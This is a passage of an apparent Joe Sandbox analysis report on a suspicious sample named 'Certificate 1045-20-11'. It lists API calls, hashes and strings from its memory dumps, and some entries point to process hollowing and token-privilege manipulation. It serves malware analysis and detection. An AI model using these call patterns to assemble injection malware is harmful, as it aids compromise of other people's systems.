                                                                                • Instruction Fuzzy Hash: A4911534A00618DFDB28DF18C4919A9B7E5FF4A314B55806AE85ACB7A2DB30FD41CF81
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00843A73
                                                                                  • Part of subcall function 00861405: __lock.LIBCMT ref: 0086140B
                                                                                  • Part of subcall function 00843ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00843AF3
                                                                                  • Part of subcall function 00843ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00843B08
                                                                                  • Part of subcall function 00843D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00843AA3,?), ref: 00843D45
                                                                                  • Part of subcall function 00843D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00843AA3,?), ref: 00843D57
                                                                                  • Part of subcall function 00843D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00901148,00901130,?,?,?,?,00843AA3,?), ref: 00843DC8
                                                                                  • Part of subcall function 00843D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00843AA3,?), ref: 00843E48
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00843AB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                • String ID:
                                                                                • API String ID: 924797094-0
                                                                                • Opcode ID: 6d8e7486179619e381caf0bbe164b9b232169b1dae26d0358402dcdbdb1b38e2
                                                                                • Instruction ID: 2640ff40c57f85a118d2e4d2403a9763e303acdce7d40c463badd0addd9c980b
                                                                                • Opcode Fuzzy Hash: 6d8e7486179619e381caf0bbe164b9b232169b1dae26d0358402dcdbdb1b38e2
                                                                                • Instruction Fuzzy Hash: FC119D719183459FC700EF69E84990EFBF9FB94710F00891EF885C72A2DB709984CB92
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 0086EA29
                                                                                • __close_nolock.LIBCMT ref: 0086EA42
                                                                                  • Part of subcall function 00867BDA: __getptd_noexit.LIBCMT ref: 00867BDA
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                • String ID:
                                                                                • API String ID: 1046115767-0
                                                                                • Opcode ID: 2d4ce43a34eb41ec2348b8b94e9a070415de56b6feecde299cb22b37b4b842ac
                                                                                • Instruction ID: 7f9bdd68946c1f489bc4ed7f32115e83f443216fc3fd119c56185452c9450b14
                                                                                • Opcode Fuzzy Hash: 2d4ce43a34eb41ec2348b8b94e9a070415de56b6feecde299cb22b37b4b842ac
                                                                                • Instruction Fuzzy Hash: F711C2768196648ED712BFACC8813187A61FF91336F270340E530DF1E2DBB488009AE2
                                                                                APIs
                                                                                  • Part of subcall function 0086395C: __FF_MSGBANNER.LIBCMT ref: 00863973
                                                                                  • Part of subcall function 0086395C: __NMSG_WRITE.LIBCMT ref: 0086397A
                                                                                  • Part of subcall function 0086395C: RtlAllocateHeap.NTDLL(00C60000,00000000,00000001,00000001,00000000,?,?,0085F507,?,0000000E), ref: 0086399F
                                                                                • std::exception::exception.LIBCMT ref: 0085F51E
                                                                                • __CxxThrowException@8.LIBCMT ref: 0085F533
                                                                                  • Part of subcall function 00866805: RaiseException.KERNEL32(?,?,0000000E,008F6A30,?,?,?,0085F538,0000000E,008F6A30,?,00000001), ref: 00866856
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 3902256705-0
                                                                                • Opcode ID: f38800e2e93d445a8d8ec99e84baa0bb8bf14f3cf39cdb74dd21ec6c4d02c92d
                                                                                • Instruction ID: 879ed22648feada07786b47dd3c491723e9b83982c6ab24ce105e22dd39bcca5
                                                                                • Opcode Fuzzy Hash: f38800e2e93d445a8d8ec99e84baa0bb8bf14f3cf39cdb74dd21ec6c4d02c92d
                                                                                • Instruction Fuzzy Hash: 6AF0A43110421EA7DB04BFADD801ADE77ACFF00355F608539FF08D2182EBB0D65886A6
                                                                                APIs
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                • __lock_file.LIBCMT ref: 00863629
                                                                                  • Part of subcall function 00864E1C: __lock.LIBCMT ref: 00864E3F
                                                                                • __fclose_nolock.LIBCMT ref: 00863634
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2800547568-0
                                                                                • Opcode ID: 2ba9a145e1c2dce1b3bd2a8cc18d3e23fcdacb8ad4b77465b1a5ecc9dcf64cc6
                                                                                • Instruction ID: cf33b8334a606fcc3c19a1e7a85c628e438d7e1e2f10ed253cbe2060106cf74f
                                                                                • Opcode Fuzzy Hash: 2ba9a145e1c2dce1b3bd2a8cc18d3e23fcdacb8ad4b77465b1a5ecc9dcf64cc6
                                                                                • Instruction Fuzzy Hash: A0F0BB71901204AAD7127BBDC80676E76A0FF50334F278118E421EB2D1D77C8611AB97
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00EAF5B3
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00EAF649
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EAF66B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction ID: 62c343b49f6cde4bc4b9947e19211c105b0f197715b89c6d30e26086f7959747
                                                                                • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                • Instruction Fuzzy Hash: 1612D124E14658C6EB24DF64D8507DEB232EF68300F1060E9D10DEB7A5E77A5E81CF5A
                                                                                APIs
                                                                                • __flush.LIBCMT ref: 00862A0B
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __flush__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 4101623367-0
                                                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction ID: ceea64707cbac7962b6344974bb51a8c9b92763238c30a4ff67d3f3bd016867f
                                                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                • Instruction Fuzzy Hash: FA41A831700F169FDB2C8EA9C88196E7BA6FF84361F2585BDE855CB280D6B4DD418B40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                APIs
                                                                                  • Part of subcall function 00844214: FreeLibrary.KERNEL32(00000000,?), ref: 00844247
                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008439FE,?,00000001), ref: 008441DB
                                                                                  • Part of subcall function 00844291: FreeLibrary.KERNEL32(00000000), ref: 008442C4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Free$Load
                                                                                • String ID:
                                                                                • API String ID: 2391024519-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClearVariant
                                                                                • String ID:
                                                                                • API String ID: 1473721057-0
                                                                                APIs
                                                                                • ___lock_fhandle.LIBCMT ref: 0086AFC0
                                                                                  • Part of subcall function 00867BDA: __getptd_noexit.LIBCMT ref: 00867BDA
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit$___lock_fhandle
                                                                                • String ID:
                                                                                • API String ID: 1144279405-0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                APIs
                                                                                • __lock_file.LIBCMT ref: 00862AED
                                                                                  • Part of subcall function 00867C0E: __getptd_noexit.LIBCMT ref: 00867C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd_noexit__lock_file
                                                                                • String ID:
                                                                                • API String ID: 2597487223-0
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,008439FE,?,00000001), ref: 00844286
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008440C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID:
                                                                                • API String ID: 82841172-0
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00EAFE09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000001F4), ref: 00EAFE09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1723876802.0000000000EAD000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ead000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 008AF87D
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008AF8DC
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008AF919
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008AF940
                                                                                • SendMessageW.USER32 ref: 008AF966
                                                                                • _wcsncpy.LIBCMT ref: 008AF9D2
                                                                                • GetKeyState.USER32(00000011), ref: 008AF9F3
                                                                                • GetKeyState.USER32(00000009), ref: 008AFA00
                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008AFA16
                                                                                • GetKeyState.USER32(00000010), ref: 008AFA20
                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008AFA4F
                                                                                • SendMessageW.USER32 ref: 008AFA72
                                                                                • SendMessageW.USER32(?,00001030,?,008AE059), ref: 008AFB6F
                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 008AFB85
                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008AFB96
                                                                                • SetCapture.USER32(?), ref: 008AFB9F
                                                                                • ClientToScreen.USER32(?,?), ref: 008AFC03
                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008AFC0F
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 008AFC29
                                                                                • ReleaseCapture.USER32 ref: 008AFC34
                                                                                • GetCursorPos.USER32(?), ref: 008AFC69
                                                                                • ScreenToClient.USER32(?,?), ref: 008AFC76
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 008AFCD8
                                                                                • SendMessageW.USER32 ref: 008AFD02
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 008AFD41
                                                                                • SendMessageW.USER32 ref: 008AFD6C
                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008AFD84
                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 008AFD8F
                                                                                • GetCursorPos.USER32(?), ref: 008AFDB0
                                                                                • ScreenToClient.USER32(?,?), ref: 008AFDBD
                                                                                • GetParent.USER32(?), ref: 008AFDD9
                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 008AFE3F
                                                                                • SendMessageW.USER32 ref: 008AFE6F
                                                                                • ClientToScreen.USER32(?,?), ref: 008AFEC5
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008AFEF1
                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 008AFF19
                                                                                • SendMessageW.USER32 ref: 008AFF3C
                                                                                • ClientToScreen.USER32(?,?), ref: 008AFF86
                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008AFFB6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008B004B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                • String ID: @GUI_DRAGID$F
                                                                                • API String ID: 2516578528-4164748364
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 008AB1CD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: %d/%02d/%02d
                                                                                • API String ID: 3850602802-328681919
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 0085EB4A
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008B3AEA
                                                                                • IsIconic.USER32(000000FF), ref: 008B3AF3
                                                                                • ShowWindow.USER32(000000FF,00000009), ref: 008B3B00
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 008B3B0A
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008B3B20
                                                                                • GetCurrentThreadId.KERNEL32 ref: 008B3B27
                                                                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 008B3B33
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 008B3B44
                                                                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 008B3B4C
                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 008B3B54
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 008B3B57
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B6C
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3B77
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B81
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3B86
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B8F
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3B94
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 008B3B9E
                                                                                • keybd_event.USER32(00000012,00000000), ref: 008B3BA3
                                                                                • SetForegroundWindow.USER32(000000FF), ref: 008B3BA6
                                                                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 008B3BCD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 4125248594-2988720461
                                                                                APIs
                                                                                  • Part of subcall function 0087B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087B180
                                                                                  • Part of subcall function 0087B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087B1AD
                                                                                  • Part of subcall function 0087B134: GetLastError.KERNEL32 ref: 0087B1BA
                                                                                • _memset.LIBCMT ref: 0087AD08
                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0087AD5A
                                                                                • CloseHandle.KERNEL32(?), ref: 0087AD6B
                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0087AD82
                                                                                • GetProcessWindowStation.USER32 ref: 0087AD9B
                                                                                • SetProcessWindowStation.USER32(00000000), ref: 0087ADA5
                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0087ADBF
                                                                                  • Part of subcall function 0087AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0087ACC0), ref: 0087AB99
                                                                                  • Part of subcall function 0087AB84: CloseHandle.KERNEL32(?,?,0087ACC0), ref: 0087ABAB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                • String ID: $default$winsta0
                                                                                • API String ID: 2063423040-1027155976
                                                                                APIs
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00885FA6,?), ref: 00886ED8
                                                                                  • Part of subcall function 00886EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00885FA6,?), ref: 00886EF1
                                                                                  • Part of subcall function 0088725E: __wsplitpath.LIBCMT ref: 0088727B
                                                                                  • Part of subcall function 0088725E: __wsplitpath.LIBCMT ref: 0088728E
                                                                                  • Part of subcall function 008872CB: GetFileAttributesW.KERNEL32(?,00886019), ref: 008872CC
                                                                                • _wcscat.LIBCMT ref: 00886149
                                                                                • _wcscat.LIBCMT ref: 00886167
                                                                                • __wsplitpath.LIBCMT ref: 0088618E
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 008861A4
                                                                                • _wcscpy.LIBCMT ref: 00886209
                                                                                • _wcscat.LIBCMT ref: 0088621C
                                                                                • _wcscat.LIBCMT ref: 0088622F
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0088625D
                                                                                • DeleteFileW.KERNEL32(?), ref: 0088626E
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00886289
                                                                                • MoveFileW.KERNEL32(?,?), ref: 00886298
                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 008862AD
                                                                                • DeleteFileW.KERNEL32(?), ref: 008862BE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 008862E1
                                                                                • FindClose.KERNEL32(00000000), ref: 008862FD
                                                                                • FindClose.KERNEL32(00000000), ref: 0088630B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
